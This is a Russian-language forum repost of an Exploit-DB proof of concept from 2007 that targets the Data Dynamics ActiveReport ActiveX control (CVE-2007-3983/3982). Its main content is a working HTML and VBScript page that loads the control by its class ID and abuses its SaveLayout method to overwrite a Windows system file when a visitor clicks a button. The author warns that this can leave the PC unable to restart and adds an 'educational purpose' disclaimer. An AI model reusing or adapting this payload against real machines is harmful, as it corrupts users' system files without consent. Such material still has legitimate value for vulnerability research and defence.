Exploit Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4208
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2007-3983 cve-2007-3982
Дата публикации
2007-07-21
HTML:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveReport ActiveX Control (actrpt2.dll <= 2.5) "SaveLayout()" Inscure Method</b>
 url: http://www.datadynamics.com/default.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 <b>This control is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False</b>
-----------------------------------------------------------------------------------------------

<object classid='clsid:9EB8768B-CDFA-44DF-8F3E-857A8405E1DB' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
    test.SaveLayout "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-07-21]
 
Источник
www.exploit-db.com

Похожие темы